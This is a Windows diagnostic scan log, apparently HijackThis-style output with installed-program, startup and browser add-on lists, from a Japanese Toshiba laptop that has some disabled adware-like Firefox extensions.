O16 - DPF: {53F4962A-8E27-4601-8B01-79A82B4D7FC9} (LoadPrg Class) - https://member.gungho.jp/front/member/webgs/LoadPrgAx.CAB
O18 - Protocol: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe32.dll
O18 - Protocol: tmop - {69FD7CE3-4604-4FE6-967C-49B9735CEE70} - C:\Program Files\NTTW\Security\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg32.dll
O18 - Protocol: tmtb - {04EAF3FB-4BAC-4B5A-A37D-A1CF210A5A42} - C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
O18 - Protocol: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files\NTTW\Security\SEC\UIFramework\ProToolbarIMRatingActiveX.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Unknown owner - (no file)
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\windows\System32\alg.exe (file missing)
O23 - Service: Security Solution Platform (Amsp) - Trend Micro Inc. - C:\Program Files\NTTW\Security\AMSP\coreServiceShell.exe
O23 - Service: Baidu Japanese IME Service_3.5.2.45 (BaiduJP_IME_Service_3.5.2.45) - Unknown owner - (no file)
O23 - Service: BWH32S - BUFFALO INC. - C:\Program Files (x86)\BUFFALO\clientmgrv\bin\BWH32S.exe
O23 - Service: ConfigFree WiMAX Service (cfWiMAXService) - TOSHIBA CORPORATION - C:\Program Files (x86)\TOSHIBA\ConfigFree\CFIWmxSvcs64.exe
O23 - Service: CLHNService - Unknown owner - C:\Program Files (x86)\CyberLink\RZ Player\Kernel\DMP\CLHNService.exe
O23 - Service: ConfigFree プロファイルサービス (ConfigFree Service) - TOSHIBA CORPORATION - C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSvcs.exe
O23 - Service: CypherGuard cguard Service 32bit Edition - CypherTec Inc. - C:\Program Files (x86)\Common Files\CypherTec\cgrdsrv32.exe
O23 - Service: CypherGuard cguard Service 64bit Edition - CypherTec Inc. - C:\Program Files\Common Files\CypherTec\cgrdsrv64.exe
O23 - Service: CypherGuard Info Service - CypherTec Inc. - C:\Program Files\Common Files\CypherTec\cthwsrv64.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\windows\System32\lsass.exe (file missing)
O23 - Service: EPSON V3 Service4(04) (EPSON_PM_RPCV4_04) - SEIKO EPSON CORPORATION - C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S50RPB.EXE
O23 - Service: Intel(R) PROSet/Wireless Event Log (EvtEng) - Intel(R) Corporation - C:\Program Files\Intel\WiFi\bin\EvtEng.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\windows\system32\fxssvc.exe (file missing)
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: LiveUpdate (LiveUpdateSvc) - IObit - C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
O23 - Service: LLHDClient - Intercom, Inc. - C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\LLHDClient.exe
O23 - Service: LLHDCloader - Intercom, Inc. - C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\LLHDCldr.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\windows\System32\msdtc.exe (file missing)
O23 - Service: MyEPSON Connect Service - SEIKO EPSON CORPORATION - C:\Program Files (x86)\EPSON\MyEPSON Connect\mepService.exe
O23 - Service: Wireless PAN DHCP Server (MyWiFiDHCPDNS) - Unknown owner - C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
O23 - Service: nProtect GameGuard Service (npggsvc) - Unknown owner - C:\windows\system32\GameMon.des.exe (file missing)
O23 - Service: Toshiba Places Digestword (PBExtractService) - TOSHIBA CORPORATION - C:\Program Files (x86)\Toshiba\Toshiba Places Digestword\PBExtractService.exe
O23 - Service: Platinum Host Service - Trend Micro Inc. - C:\Program Files\NTTW\Security\SEC\plugin\Pt\PtSvcHost.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: Protexis Licensing V2 (PSI_SVC_2) - Protexis Inc. - c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
O23 - Service: Intel(R) PROSet/Wireless Registry Service (RegSrvc) - Intel(R) Corporation - C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: TMachInfo - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
O23 - Service: TOSHIBA Optical Disc Drive Service (TODDSrv) - Unknown owner - C:\windows\system32\TODDSrv.exe (file missing)
O23 - Service: TOSHIBA Power Saver (TosCoSrv) - TOSHIBA Corporation - C:\Program Files\Toshiba\Power Saver\TosCoSrv.exe
O23 - Service: TOSHIBA eco Utility Service - TOSHIBA Corporation - C:\Program Files\TOSHIBA\TECO\TecoService.exe
O23 - Service: TOSHIBA HDD SSD Alert Service - TOSHIBA Corporation - C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
O23 - Service: TOSHIBA TosRzTf Control Service (TosRzTfSvc) - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\RegzaLinkDubbing\TosRzTfSvc.exe
O23 - Service: TPCHKarteSVC - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\TKRTL\TPCHKarteSVC.exe
O23 - Service: TPCH Service (TPCHSrv) - TOSHIBA Corporation - C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
O23 - Service: UDSS - Unknown owner - c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: Update Hold Page - Intel Corporation - (no file)
O23 - Service: Util Hold Page - Unknown owner - (no file)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 15717 bytes

Adobe Flash Player 17 NPAPI Adobe Systems Incorporated 2015/04/27 6.00 MB 17.0.0.169
Atheros Communications Inc.(R) AR81Family Gigabit/Fast Ethernet Driver Atheros Communications Inc. 2012/04/24 1.0.0.36
BookPlaceReader Toshiba Book Place 2012/04/24 79.8 MB 1.6.80
BUFFALO AirStation倍速設定ツール(アンインストール) 2014/05/19
BUFFALO クライアントマネージャV をアンインストール BUFFALO INC. 2014/05/19 9.87 MB 1.4.10
CCleaner Piriform 2015/04/27 5.05
Conexant HD Audio Conexant 2012/04/24 8.51.1.0
Corel Digital Studio SE Corel Corporation 2012/04/24 1.79 GB 1.5.10.433
Epson Download Navigator SEIKO EPSON CORPORATION 2012/05/05 705 KB 1.0.1
Epson E-Photo SEIKO EPSON CORPORATION 2012/05/05 1.3.0.0
Epson E-Photo Plug-in for PMB(Picture Motion Browser) SEIKO EPSON CORPORATION 2012/05/05 1.00.0000
Epson E-Web Print SEIKO EPSON CORPORATION 2012/05/05 11.7 MB 1.09.0000
Epson Event Manager SEIKO EPSON CORPORATION 2012/05/05 40.5 MB 2.50.0000
EPSON PX-404A プリンター アンインストール SEIKO EPSON Corporation 2012/05/05
EPSON PX-404A ユーザーズガイド 2012/05/06
EPSON Scan Seiko Epson Corporation 2012/05/05
EPSON Scan OCR コンポーネント SEIKO EPSON Corp. 2012/05/05 1.20.0000
Google Chrome Google Inc. 2015/03/21 42.0.2311.135
Intel(R) Management Engine Components Intel Corporation 7.0.0.1144
Intel(R) Processor Graphics Intel Corporation 8.15.10.2509
Intel(R) Rapid Storage Technology Intel Corporation 10.1.2.1004
Intel(R) WiDi Intel Corporation 2012/04/24 139 MB 2.1.42.0
IObit Uninstaller IObit 2014/10/15 4.0.4.1
LAPLINK ヘルプデスク クライアント Intercom, Inc. 2012/04/24 1.22
LoiLoScope 2 LoiLo inc 2011/11/22 181 MB 2.0.3.1
Malwarebytes Anti-Malware バージョン 2.0.4.1028 Malwarebytes Corporation 2015/04/29 57.2 MB 2.0.4.1028
Microsoft .NET Framework 4.5.1 (日本語) Microsoft Corporation 2014/03/06 2.93 MB 4.5.50938
Microsoft .NET Framework 4.5.2 Microsoft Corporation 2015/01/15 38.8 MB 4.5.51209
Microsoft Office 2010 Microsoft Corporation 2013/11/12 14.0.7015.1000
Microsoft Office ナビ 2010 Microsoft Corporation 2013/11/12 17.3 MB 14.0.7015.1000
Microsoft Primary Interoperability Assemblies 2005 Microsoft Corporation 2011/11/22 7.75 MB 9.0.21022
Microsoft Silverlight Microsoft Corporation 2014/07/24 249 MB 5.1.30514.0
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 2011/11/22 1.69 MB 3.1.0000
Microsoft SQL Server Compact 3.5 SP2 ENU Microsoft Corporation 2012/04/24 3.39 MB 3.5.8080.0
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2012/05/05 2.62 MB 8.0.59193
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 Microsoft Corporation 2011/11/22 788 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Microsoft Corporation 2012/05/04 788 KB 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2012/04/24 230 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2011/11/22 596 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 Microsoft Corporation 2011/11/22 592 KB 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Microsoft Corporation 2012/05/04 600 KB 9.0.30729.6161
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2014/10/16 13.8 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2014/10/16 15.0 MB 10.0.40219
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Microsoft Corporation 2014/10/16 10.0.50903
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - 日本語 Microsoft Corporation 2014/10/16 10.0.50903
Microsoft XNA Framework Redistributable 4.0 Microsoft Corporation 2014/09/29 8.03 MB 4.0.20823.0
MSXML 4.0 SP2 (KB954430) Microsoft Corporation 2014/11/16 1.27 MB 4.20.9870.0
MSXML 4.0 SP2 (KB973688) Microsoft Corporation 2014/11/16 1.33 MB 4.20.9876.0
MyEPSON Connect SEIKO EPSON Corporation 2012/05/05
NTT西日本 リモートサポートツール 西日本電信電話株式会社 2012/06/23
PCあんしん点検ユーティリティ TOSHIBA Corporation 2012/04/24 2.82 MB 1.1.3.0
PC引越ナビ 東芝情報機器株式会社 2011/11/22 12.7 MB 4.1.3
PhotoWizard Microsoft 2012/04/24 387 MB 1.0.0
PlayReady PC Runtime amd64 Microsoft Corporation 2011/11/22 2.05 MB 1.3.0
Realtek USB 2.0 Reader Driver Realtek Semiconductor Corp. 2012/04/24 1.0.0.7
Renesas Electronics USB 3.0 Host Controller Driver Renesas Electronics Corporation 2012/04/24 276 KB 2.0.34.1
RZプレーヤー CyberLink Corp. 2012/04/24 1.5.9508
Sempre
Skype(TM) 7.3 Skype Technologies S.A. 2015/04/23 78.4 MB 7.3.101
Steam Valve Corporation 2014/09/29 2.10.91.91
Terraria Re-Logic 2014/09/29
TOSHIBA Bulletin Board TOSHIBA Corporation 2012/04/24 2.1.17.64
TOSHIBA ConfigFree TOSHIBA CORPORATION 2012/04/24 85.7 MB 8.0.42
TOSHIBA Disc Creator TOSHIBA Corporation 2012/04/24 11.0 MB 2.1.0.11 for x64
TOSHIBA ecoユーティリティ TOSHIBA Corporation 2012/04/24 18.8 MB 1.3.8.64
TOSHIBA Face Recognition TOSHIBA Corporation 2012/04/24 3.1.18.64
TOSHIBA Hardware Setup TOSHIBA 2012/04/24 4.08.09.00
TOSHIBA Manual TOSHIBA CORPORATION 2012/04/24 35.0 MB 0094.6404.2402
TOSHIBA Media Controller TOSHIBA CORPORATION 2012/04/24 1.0.87.4
TOSHIBA Media Controller Plug-in TOSHIBA CORPORATION 2012/04/24 6.65 MB 1.0.7.7
TOSHIBA PalaDouga TOSHIBA CORPORATION 2011/11/22 767 MB 2012.0101.0001
TOSHIBA PC Health Monitor TOSHIBA Corporation 2012/04/24 28.9 MB 1.7.11.64
TOSHIBA Peak Shift Control TOSHIBA Corporation 3.00.05.64
TOSHIBA Recovery Media Creator TOSHIBA CORPORATION 2011/11/22 2.1.5.5109a
TOSHIBA ReelTime TOSHIBA Corporation 2012/04/24 1.7.21.64
TOSHIBA Resolution+ Plug-in for Windows Media Player TOSHIBA Corporation 2012/04/24 1.1.2003
TOSHIBA SD-Video PLAYER TOSHIBA Corporation 2012/04/24 1.00.2.21-B
TOSHIBA Service Station TOSHIBA 2012/04/24 2.2.13
TOSHIBA Sleep Utility TOSHIBA Corporation 2012/04/24 1.4.2.9
TOSHIBA Speech Synthesis TOSHIBA CORPORATION 2012/04/24 65.0 MB 1.5.0.1
TOSHIBA Supervisor Password TOSHIBA 2012/04/24 4.08.09.00
TOSHIBA Sync Utility TOSHIBA Corporation 2011/11/22 2.0.3090
TOSHIBA Value Added Package TOSHIBA Corporation 2012/04/24 131 MB 1.6.16.64
TOSHIBA VIDEO PLAYER TOSHIBA Corporation 2012/04/24 45.9 MB 5.0.0.4-B
TOSHIBA Web Camera Application TOSHIBA Corporation 2012/04/24 65.2 MB 2.0.3.29
TOSHIBA Wireless Display Monitor TOSHIBA CORPORATION 2012/04/24 1.68 MB 1.0.1
TOSHIBA Wireless LAN Indicator TOSHIBA CORPORATION 2012/04/24 5.06 MB 1.0.5
TOSHIBA 無線LANらくらく設定 TOSHIBA CORPORATION 2011/11/22 18.2 MB 2.0.10.0628.1115n
Windows Live Essentials Microsoft Corporation 2011/11/22 15.4.3502.0922
いつもNAVI PC ZENRIN 2011/11/22 6.1.2
おたすけナビ 東芝情報機器株式会社 2011/11/22 20.9 MB 6.1.3
おまかせフォトムービー TOSHIBA CORPORATION 2012/04/24 139 MB 1.1.2000.1
てぶらナビ TOSHIBA CORPORATION 2012/04/24 22.8 MB 1.5.1.5
インテル(R) PROSet/Wireless WiFi ソフトウェア Intel Corporation 2012/04/24 130 MB 14.01.1000
スタートアップツール 西日本電信電話株式会社 2012/06/23 2.60 MB 6.0
セキュリティ対策ツール 西日本電信電話株式会社 2015/04/27 450 MB 8.11
セキュリティ申込・設定ツール 西日本電信電話株式会社 2015/04/27 3.58 MB 7.1.0.7
レグザリンク・ダビング TOSHIBA CORPORATION 2012/04/24 1.0.11.1-A
動画で解決!操作ガイド 東芝情報機器株式会社 2011/11/22 15.9 MB 2.1.3
動画で解決!操作ガイド-コンテンツ- 東芝情報機器株式会社 2011/11/22 148 KB 2.1.3
東芝HDD/SSDアラータ TOSHIBA Corporation 2012/04/24 55.0 MB 3.1.64.9
東芝ピークシフトコントロール TOSHIBA Corporation 2012/04/24 3.00.05.64
東芝プレイス ダイジェストワード TOSHIBA CORPORATION 2012/12/16 7.40 MB 1.0.1
東芝プレイスガジェット TOSHIBA CORPORATION 2012/04/24 2.81 MB 3.0.3
東芝プレイスガジェット用ライブラリ TOSHIBA CORPORATION 2011/11/22 997 KB 2.0.0
筆ぐるめ Ver.19 富士ソフト株式会社 2011/11/22 587 MB 19.00.0000
診断復旧ツール 西日本電信電話株式会社 2014/05/07 12.5 MB

有効 HKCU:Run CCleaner Monitoring Piriform Ltd "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
有効 HKCU:Run EPLTarget\P0000000000000000 SEIKO EPSON CORPORATION C:\windows\system32\spool\DRIVERS\x64\3\E_IATIHKJ.EXE /EPT "EPLTarget\P0000000000000000" /M "PX-404A"
有効 HKLM:Run cAudioFilterAgent Conexant Systems, Inc. C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent64.exe
有効 HKLM:Run EEventManager SEIKO EPSON CORPORATION "C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe"
有効 HKLM:Run HotKeysCmds Intel Corporation C:\windows\system32\hkcmd.exe
有効 HKLM:Run IgfxTray Intel Corporation C:\windows\system32\igfxtray.exe
有効 HKLM:Run IME14 JPN Setup Microsoft Corporation C:\PROGRA~2\COMMON~1\MICROS~1\IME14\SHARED\IMEKLMG.EXE /SetPreload /JPN /Log
有効 HKLM:Run IntelPAN Intel(R) Corporation "C:\Program Files\Common Files\Intel\WirelessCommon\iFrmewrk.exe" /tf Intel PAN Tray
有効 HKLM:Run LLHDUSER Intercom, Inc. "C:\Program Files (x86)\Intercom\LAPLINK HelpDesk Client\llhuser.exe"
有効 HKLM:Run NTTW_OSA_AUS 西日本電信電話株式会社 "C:\Program Files (x86)\NTTW\OSA_Aus\acs.exe" -silent
有効 HKLM:Run Persistence Intel Corporation C:\windows\system32\igfxpers.exe
有効 HKLM:Run Platinum Trend Micro Inc. "C:\Program Files\NTTW\Security\SEC\plugin\Pt\PtSessionAgent.exe" -StartUp
有効 HKLM:Run SmartAudio Conexant systems, Inc. C:\Program Files\CONEXANT\SAII\SAIICpl.exe /t
有効 HKLM:Run SynTPEnh Synaptics Incorporated %ProgramFiles%\Synaptics\SynTP\SynTPEnh.exe
有効 HKLM:Run TCrdMain TOSHIBA Corporation %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
有効 HKLM:Run Teco "%ProgramFiles%\TOSHIBA\TECO\Teco.exe" /r
有効 HKLM:Run ToshibaPlacesGadget TOSHIBA CORPORATION "C:\Program Files (x86)\Toshiba Places Gadget\ToshibaPlacesGadget.exe" -atboottime
有効 HKLM:Run ToshibaServiceStation TOSHIBA Corporation "C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe" /hide:60
有効 HKLM:Run TosNC TOSHIBA Corporation %ProgramFiles%\Toshiba\BulletinBoard\TosNcCore.exe
有効 HKLM:Run TosReelTimeMonitor TOSHIBA Corporation %ProgramFiles%\TOSHIBA\ReelTime\TosReelTimeMonitor.exe
有効 HKLM:Run TosSENotify TOSHIBA Corporation C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosWaitSrv.exe
有効 HKLM:Run TosWaitSrv TOSHIBA Corporation %ProgramFiles%\TOSHIBA\TPHM\TosWaitSrv.exe
有効 HKLM:Run TouchFree TOSHIBA Corporation C:\Program Files (x86)\TOSHIBA\TouchFree\TouchFreeTray.exe
有効 HKLM:Run TPSCMain TOSHIBA Corporation %ProgramFiles%\TOSHIBA\PeakShift\TPSCMain.exe
有効 HKLM:Run TPwrMain TOSHIBA Corporation %ProgramFiles%\TOSHIBA\Power Saver\TPwrMain.EXE
有効 HKLM:Run Trend Micro Client Framework Trend Micro Inc. "C:\Program Files\NTTW\Security\UniClient\UiFrmWrk\UIWatchDog.exe"
有効 HKLM:Run TSleepSrv TOSHIBA %ProgramFiles(x86)%\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe
有効 HKLM:Run TSUScheduler TOSHIBA Corporation %ProgramFiles(x86)%\TOSHIBA\Sync Utility\TosSyncScheduler.exe
有効 HKLM:Run Unattend0000000001{7EEC0247-1AD3-4C6D-95A0-BC5399CB7B8A} AnywhereWorking L.T.D. C:\tosutils\palakidou\palakidou.exe
有効 Startup Common クライアントマネージャV.lnk BUFFALO INC. C:\Program Files (x86)\BUFFALO\clientmgrv\bin\cmvMain.exe

有効 Extension OneNote に送る Microsoft Corporation C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
有効 Extension OneNote に送る Microsoft Corporation C:\Program Files\Microsoft Office\Office14\ONBttnIE.dll
有効 Extension OneNote リンク ノート(K) Microsoft Corporation C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
有効 Extension OneNote リンク ノート(K) Microsoft Corporation C:\Program Files\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
有効 Extension TOSHIBA Bulletin Boardへ追加 TODO: <会社名> C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll
有効 Extension TOSHIBA Bulletin Boardへ追加 TODO: <会社名> C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom64.dll
有効 Extension このコンテンツを引用 Microsoft Corporation C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
有効 Extension 故障かな?と思ったら・・・ 西日本電信電話株式会社 C:\Program Files (x86)\NTTW\OSA_SupportTool\start_w.exe
無効 Helper E-Photo SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Photo\EPTBL.dll
無効 Helper E-Web Print SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll
有効 Helper ExplorerWnd Helper IObit C:\Program Files (x86)\IObit\IObit Uninstaller\UninstallExplorer64.dll
無効 Helper Office Document Cache Handler Microsoft Corporation C:\PROGRA~2\MICROS~4\Office14\URLREDIR.DLL
無効 Helper Office Document Cache Handler Microsoft Corporation C:\PROGRA~1\MICROS~2\Office14\URLREDIR.DLL
無効 Helper TmBpIeBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe32.dll
無効 Helper TmBpIeBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20002\9.0.1069\9.0.1069\TmBpIe64.dll
有効 Helper TmIEPlugInBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg32.dll
有効 Helper TmIEPlugInBHO Class Trend Micro Inc. C:\Program Files\NTTW\Security\AMSP\module\20013\3.5.1186\2.0.1039\TmopIEPlg.dll
無効 Helper TOSHIBA Media Controller Plug-in <TOSHIBA> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll
無効 Helper TOSHIBA Media Controller Plug-in <TOSHIBA> C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\x64\TOSHIBAMediaControllerIE.dll
無効 Helper TSToolbarBHO Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
無効 Helper TSToolbarBHO Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\plugin\ToolbarIE64\ToolbarIE.dll
無効 Helper Windows Live ID Sign-in Helper Microsoft Corp. C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
無効 Helper Windows Live ID サインイン ヘルパー Microsoft Corp. C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
無効 Helper 東芝プレイス ダイジェストワード用ライブラリ TOSHIBA CORPORATION C:\Program Files (x86)\Toshiba\Toshiba Places Digestword\TPBIEAddon.dll
無効 Helper 東芝プレイス ダイジェストワード用ライブラリ TOSHIBA CORPORATION C:\Program Files (x86)\Toshiba\Toshiba Places Digestword\TPBIEAddon64.dll
無効 Toolbar E-Photo SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Photo\EPTBL.dll
無効 Toolbar E-Web Print SEIKO EPSON CORPORATION C:\Program Files (x86)\Epson Software\E-Web Print\ewps_tb.dll
無効 Toolbar セキュリティツールバー Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\UIFramework\ToolbarIE.dll
無効 Toolbar セキュリティツールバー Trend Micro Inc. C:\Program Files\NTTW\Security\SEC\plugin\ToolbarIE64\ToolbarIE.dll

無効 Extension Browsers Apps 0.95.18 browser default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\herman.thorne45@outlook.com
無効 Extension ClickForSale 1.9 default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\Na@4skpeF6a.org
無効 Extension E-Web Print 1.09.00 SEIKO EPSON CORPORATION default C:\Program Files (x86)\Epson Software\E-Web Print\Firefox Add-on
無効 Extension Hold Page 1.0.1 Hold Page default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\{15738250-181b-41cd-b01d-621a833a541c}.xpi
無効 Extension ProShopper 4.87 default C:\Users\Owner\AppData\Roaming\Mozilla\Firefox\Profiles\d3m0wihh.default\extensions\w1@bVfSQOc5.com
無効 Extension Skype Click to Call 7.3.16540.9015 Microsoft Corporation default C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi
無効 Extension Trend Micro BEP Firefox Extension 7.5.0.1144 Trend Micro default C:\Program Files\NTTW\Security\AMSP\Module\20002\7.5.1144\7.5.1144\firefoxextension
無効 Extension Trend Micro NSC Firefox Extension 6.8.0.1096 Trend Micro default C:\Program Files\NTTW\Security\AMSP\module\20004\FxExt\firefoxextension
無効 Extension セキュリティツールバー 6.11.0.3085 繝医Ξ繝ウ繝峨・繧、繧ッ繝ュ default C:\Program Files\NTTW\Security\SEC\UIFramework\Toolbar\firefoxextension
有効 Plugin Adobe Acrobat 11.0.10.32 default C:\Program Files (x86)\Adobe\Reader 11.0\Reader\browser\nppdf32.dll
有効 Plugin Microsoft Office 2010 14.0.4730.1010 Microsoft Corporation default C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL
有効 Plugin Microsoft Office 2010 14.0.4761.1000 Microsoft Corporation default C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL
有効 Plugin Nexon Game Controller 1.0.1.2 Nexon default C:\ProgramData\NexonJP\NGM\npNxGameJP.dll
有効 Plugin Shockwave Flash 16.0.0.305 default C:\windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_305.dll
有効 Plugin Silverlight Plug-In 5.1.30514.0 Microsoft Corporation default c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll
有効 Plugin Windows LiveEPhoto Gallery 15.4.3502.922 Microsoft Corporation default C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
有効 Extension Trend ツールバー 8.0.0.1257 最初�Eユーザー C:\Users\Owner\AppData\Local\Google\Chrome\User Data\Default\Extensions\ohhcpmplhhiiaoiddkfboafbhiknefdf\8.0.0.1257_0
有効 Plugin Adobe Acrobat 10.1.4.38 最初�Eユーザー C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll
有効 Plugin Chrome PDF Viewer 最初�Eユーザー C:\Program Files (x86)\Google\Chrome\Application\42.0.2311.135\pdf.dll
有効 Plugin Chrome Remote Desktop Viewer 最初�Eユーザー internal-remoting-viewer
